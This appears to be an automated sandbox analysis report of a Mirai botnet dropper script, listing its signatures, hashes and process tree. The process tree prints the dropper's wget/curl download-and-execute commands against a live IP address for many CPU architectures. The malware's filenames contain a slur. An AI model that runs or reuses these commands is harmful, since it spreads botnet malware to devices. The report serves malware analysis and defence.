Overview

overview

10

Static

static

1

jewn.sh

ubuntu-18.04-amd64

10

jewn.sh

debian-9-armhf

10

jewn.sh

debian-9-mips

10

jewn.sh

debian-9-mipsel

10

Analysis

  • max time kernel
    109s
  • max time network
    150s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240611-en
  • resource tags

    arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    06/12/2024, 13:19

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    jewn.sh

  • Size

    1KB

  • MD5

    49377a7c5220a2e428c4ff6898fcd50c

  • SHA1

    0d2843613a97cc150c539474b2db2ff741260997

  • SHA256

    336fc216d10d88ac069d22db53159229050040ff570e610ddcca11040e666a4c

  • SHA512

    51189375074dc361c0b855ae89774e7888a0a3360bd8291f2d99ba2bc8de4cdf8a2307044d8aee9d9459973f2e29b5d866b7b004e7df754688324a207d77b342

Score
10/10
miraikurcantivmbotnetdefense_evasiondiscovery

Malware Config

Extracted

Family

mirai

Botnet

KURC

Extracted

Family

mirai

Botnet

KURC

Extracted

Family

mirai

Botnet

KURC

Signatures

  • Mirai

    Mirai is a prevalent Linux malware infecting exposed network devices.

    botnetmirai
  • Mirai family
    mirai
  • Contacts a large (106332) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • File and Directory Permissions Modification 1 TTPs 10 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

    defense_evasion
  • Executes dropped EXE 10 IoCs
  • Modifies Watchdog functionality 1 TTPs 10 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

    defense_evasion
  • Enumerates active TCP sockets 1 TTPs 4 IoCs

    Gets active TCP sockets from /proc virtual filesystem.

    discovery
  • Writes file to system bin folder 10 IoCs
  • Changes its process name 5 IoCs
  • Checks CPU configuration 1 TTPs 10 IoCs

    Checks CPU information which indicate if the system is a virtual machine.

    antivm
  • Reads system network configuration 1 TTPs 4 IoCs

    Uses contents of /proc filesystem to enumerate network settings.

    discovery
  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

    discovery
  • System Network Configuration Discovery 1 TTPs 3 IoCs

    Adversaries may gather information about the network configuration of a system.

    discovery
  • Writes file to tmp directory 20 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/jewn.sh
    /tmp/jewn.sh
    1⤵
    • Writes file to tmp directory
    PID:639
    • /usr/bin/wget
      wget http://93.123.85.78/bins/jew.x86
      2⤵
      • Writes file to tmp directory
      PID:641
    • /usr/bin/curl
      curl -O http://93.123.85.78/bins/jew.x86
      2⤵
      • Checks CPU configuration
      • Reads runtime system information
      • Writes file to tmp directory
      PID:659
    • /bin/cat
      cat jew.x86
      2⤵
        PID:669
      • /bin/chmod
        chmod +x jewn jewn.sh jew.x86 systemd-private-56885e0d8a02455a9d549f43410b2516-systemd-timedated.service-Z4x0J7
        2⤵
        • File and Directory Permissions Modification
        PID:670
      • /tmp/jewn
        ./jewn
        2⤵
        • Executes dropped EXE
        PID:671
      • /usr/bin/wget
        wget http://93.123.85.78/bins/jew.mips
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:674
      • /usr/bin/curl
        curl -O http://93.123.85.78/bins/jew.mips
        2⤵
        • Checks CPU configuration
        • Reads runtime system information
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:675
      • /bin/cat
        cat jew.mips
        2⤵
        • System Network Configuration Discovery
        PID:684
      • /bin/chmod
        chmod +x jew.mips jewn jewn.sh jew.x86 systemd-private-56885e0d8a02455a9d549f43410b2516-systemd-timedated.service-Z4x0J7
        2⤵
        • File and Directory Permissions Modification
        PID:685
      • /tmp/jewn
        ./jewn
        2⤵
        • Executes dropped EXE
        PID:686
      • /usr/bin/wget
        wget http://93.123.85.78/bins/jew.mpsl
        2⤵
        • Writes file to tmp directory
        PID:689
      • /usr/bin/curl
        curl -O http://93.123.85.78/bins/jew.mpsl
        2⤵
        • Checks CPU configuration
        • Reads runtime system information
        • Writes file to tmp directory
        PID:698
      • /bin/cat
        cat jew.mpsl
        2⤵
          PID:711
        • /bin/chmod
          chmod +x jew.mips jew.mpsl jewn jewn.sh jew.x86 systemd-private-56885e0d8a02455a9d549f43410b2516-systemd-timedated.service-Z4x0J7
          2⤵
          • File and Directory Permissions Modification
          PID:712
        • /tmp/jewn
          ./jewn
          2⤵
          • Executes dropped EXE
          PID:715
        • /usr/bin/wget
          wget http://93.123.85.78/bins/jew.arm4
          2⤵
            PID:718
          • /usr/bin/curl
            curl -O http://93.123.85.78/bins/jew.arm4
            2⤵
            • Checks CPU configuration
            • Reads runtime system information
            • Writes file to tmp directory
            PID:724
          • /bin/cat
            cat jew.arm4
            2⤵
              PID:730
            • /bin/chmod
              chmod +x jew.arm4 jew.mips jew.mpsl jewn jewn.sh jew.x86 systemd-private-56885e0d8a02455a9d549f43410b2516-systemd-timedated.service-Z4x0J7
              2⤵
              • File and Directory Permissions Modification
              PID:732
            • /tmp/jewn
              ./jewn
              2⤵
              • Executes dropped EXE
              PID:733
            • /usr/bin/wget
              wget http://93.123.85.78/bins/jew.arm5
              2⤵
              • Writes file to tmp directory
              PID:734
            • /usr/bin/curl
              curl -O http://93.123.85.78/bins/jew.arm5
              2⤵
              • Checks CPU configuration
              • Writes file to tmp directory
              PID:737
            • /bin/cat
              cat jew.arm5
              2⤵
                PID:738
              • /bin/chmod
                chmod +x jew.arm4 jew.arm5 jew.mips jew.mpsl jewn jewn.sh jew.x86 systemd-private-56885e0d8a02455a9d549f43410b2516-systemd-timedated.service-Z4x0J7
                2⤵
                • File and Directory Permissions Modification
                PID:739
              • /tmp/jewn
                ./jewn
                2⤵
                • Executes dropped EXE
                PID:740
              • /usr/bin/wget
                wget http://93.123.85.78/bins/jew.arm6
                2⤵
                • Writes file to tmp directory
                PID:741
              • /usr/bin/curl
                curl -O http://93.123.85.78/bins/jew.arm6
                2⤵
                • Checks CPU configuration
                • Reads runtime system information
                • Writes file to tmp directory
                PID:747
              • /bin/cat
                cat jew.arm6
                2⤵
                  PID:759
                • /bin/chmod
                  chmod +x jew.arm4 jew.arm5 jew.arm6 jew.mips jew.mpsl jewn jewn.sh jew.x86 systemd-private-56885e0d8a02455a9d549f43410b2516-systemd-timedated.service-Z4x0J7
                  2⤵
                  • File and Directory Permissions Modification
                  PID:761
                • /tmp/jewn
                  ./jewn
                  2⤵
                  • Executes dropped EXE
                  • Modifies Watchdog functionality
                  • Writes file to system bin folder
                  • Changes its process name
                  PID:762
                • /usr/bin/wget
                  wget http://93.123.85.78/bins/jew.arm7
                  2⤵
                  • Writes file to tmp directory
                  PID:766
                • /usr/bin/curl
                  curl -O http://93.123.85.78/bins/jew.arm7
                  2⤵
                  • Checks CPU configuration
                  • Reads runtime system information
                  • Writes file to tmp directory
                  PID:777
                • /bin/chmod
                  chmod +x jew.arm4 jew.arm5 jew.arm6 jew.arm7 jew.mips jew.mpsl jewn jewn.sh jew.x86 systemd-private-56885e0d8a02455a9d549f43410b2516-systemd-timedated.service-Z4x0J7
                  2⤵
                  • File and Directory Permissions Modification
                  PID:783
                • /tmp/jewn
                  ./jewn
                  2⤵
                  • Executes dropped EXE
                  • Modifies Watchdog functionality
                  • Enumerates active TCP sockets
                  • Writes file to system bin folder
                  • Changes its process name
                  • Reads system network configuration
                  • Reads runtime system information
                  PID:784
                • /usr/bin/wget
                  wget http://93.123.85.78/bins/jew.ppc
                  2⤵
                  • Writes file to tmp directory
                  PID:789
                • /usr/bin/curl
                  curl -O http://93.123.85.78/bins/jew.ppc
                  2⤵
                  • Checks CPU configuration
                  • Reads runtime system information
                  • Writes file to tmp directory
                  PID:792
                • /bin/chmod
                  chmod +x jew.arm4 jew.arm5 jew.arm6 jew.arm7 jew.mips jew.mpsl jewn jewn.sh jew.ppc jew.x86 systemd-private-56885e0d8a02455a9d549f43410b2516-systemd-timedated.service-Z4x0J7
                  2⤵
                  • File and Directory Permissions Modification
                  PID:794
                • /tmp/jewn
                  ./jewn
                  2⤵
                  • Executes dropped EXE
                  • Modifies Watchdog functionality
                  • Enumerates active TCP sockets
                  • Writes file to system bin folder
                  • Changes its process name
                  • Reads system network configuration
                  • Reads runtime system information
                  PID:796
                • /usr/bin/wget
                  wget http://93.123.85.78/bins/jew.m68k
                  2⤵
                  • Writes file to tmp directory
                  PID:805
                • /usr/bin/curl
                  curl -O http://93.123.85.78/bins/jew.m68k
                  2⤵
                  • Checks CPU configuration
                  • Writes file to tmp directory
                  PID:808
                • /bin/chmod
                  chmod +x jew.arm4 jew.arm5 jew.arm6 jew.arm7 jew.m68k jew.mips jew.mpsl jewn jewn.sh jew.ppc jew.x86
                  2⤵
                  • File and Directory Permissions Modification
                  PID:810
                • /tmp/jewn
                  ./jewn
                  2⤵
                  • Executes dropped EXE
                  • Modifies Watchdog functionality
                  • Enumerates active TCP sockets
                  • Writes file to system bin folder
                  • Changes its process name
                  • Reads system network configuration
                  • Reads runtime system information
                  PID:811
                • /usr/bin/wget
                  wget http://93.123.85.78/bins/jew.sh4
                  2⤵
                  • Writes file to tmp directory
                  PID:816
                • /usr/bin/curl
                  curl -O http://93.123.85.78/bins/jew.sh4
                  2⤵
                  • Checks CPU configuration
                  • Reads runtime system information
                  • Writes file to tmp directory
                  PID:819
                • /bin/chmod
                  chmod +x jew.arm4 jew.arm5 jew.arm6 jew.arm7 jew.m68k jew.mips jew.mpsl jewn jewn.sh jew.ppc jew.sh4 jew.x86
                  2⤵
                  • File and Directory Permissions Modification
                  PID:826
                • /tmp/jewn
                  ./jewn
                  2⤵
                  • Executes dropped EXE
                  • Modifies Watchdog functionality
                  • Enumerates active TCP sockets
                  • Writes file to system bin folder
                  • Changes its process name
                  • Reads system network configuration
                  • Reads runtime system information
                  PID:827

              Network

              MITRE ATT&CK Enterprise v15

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • /tmp/jewn
                Filesize

                60KB

                MD5

                ec9bf54e29277d9028ea800cf3cf7501

                SHA1

                371485bf2f9f86e25e618fcb98071b3f6c8524a8

                SHA256

                19385e38460e0a288e81bdcbb75e7ad23f747d5163ba276ec996bc53db3a11d2

                SHA512

                87e2fd37cead67b3e43a9b18c0c43b702ba6ecee6d1de3be60d7bf778218c872b417a693205172a2c4ad368c9ffdfe5f7dcd6ff6a0868ad946dbe5cc9e727da9

                Download Submit

              • /tmp/jewn
                Filesize

                125KB

                MD5

                c5ac3c0d137d7a994fb24f0d05335848

                SHA1

                1aca371b36bf8170bdc06e7014a5aef1c89ac0d9

                SHA256

                bd1585f0afe62dc9966151ce8f722958b21846e3a164dad19cf266a14bb5075d

                SHA512

                2dd5eedb9f9e1967db8a8025435f4bd9781592342e27ee66dd64c3ed63ec688b83adaff3995cece7f59c7acb68d93bcd2fbbdce35b94e318b9a955cb0dd64c80

                Download Submit

              • /tmp/jewn
                Filesize

                118KB

                MD5

                7987a5e42d1c90453c28ccd9ed89c03e

                SHA1

                629a14c862594d2cea7e09e26c5da9805ce7274b

                SHA256

                97e0d7a8e3c63baa4512449645728f4f1b62ee804959f8ab4123f439f8b14f77

                SHA512

                44492d04c00060c961d0d717bbfa2ffd04b81b97ef34c480dc71d72fa4af51f031384d1d0161f0d6b9ec86471c3bc9e705c5b0af3a75b3a447a9beae8730327a

                Download Submit

              • /tmp/jewn
                Filesize

                211B

                MD5

                bf7b89e47bae293118c020c809c6b64f

                SHA1

                0ce398102e0add27eae4027b8785e1a925d44d5d

                SHA256

                d299a926576581b97be372dd08ea722eb47e9d634b5a07669993b42efbc1a5bd

                SHA512

                3ddf7c5a29121f52f3bf2023a86b9f1787ac2e4cd2691d441528e7889868a1c4d97c153f1d1b6ea4a86fb7b2a9cad9888324dcdf92390c8932e17ba486a54409

                Download Submit

              • /tmp/jewn
                Filesize

                50KB

                MD5

                5a9f4fe4dc534502de24b5a693c90f1c

                SHA1

                854f4d1fd83615af2205c5024521f4c335d36cc8

                SHA256

                fb4cb7c328369faf2ad09dfb90db1638692e62974a0b07b95f29ca1411c8e39f

                SHA512

                998e7c8201762a388f689a00bcdcafcd33ac3c4ac0a6d88509c9de792ef72d47e79a75571aab58611848599370c335adf5792e14fe87e2474ff36d00a74908ce

                Download Submit

              • /tmp/jewn
                Filesize

                74KB

                MD5

                50ccc4094919b90c09d316f111c8e458

                SHA1

                299bead6bb02f8dddeec6b32e7f597ed2401caf6

                SHA256

                18029dcf1c9f4de253b3efca431386294bb6bfc45edb05487a786eab6f0f664e

                SHA512

                83fcfe786f50264e1931615c39c2cf7330f297177f9c8d3c3c17d72ca629e598b6fd263dd515ba17053255122439bd8df5a75cf1b16e6ab8ebfa15dbf70474d1

                Download Submit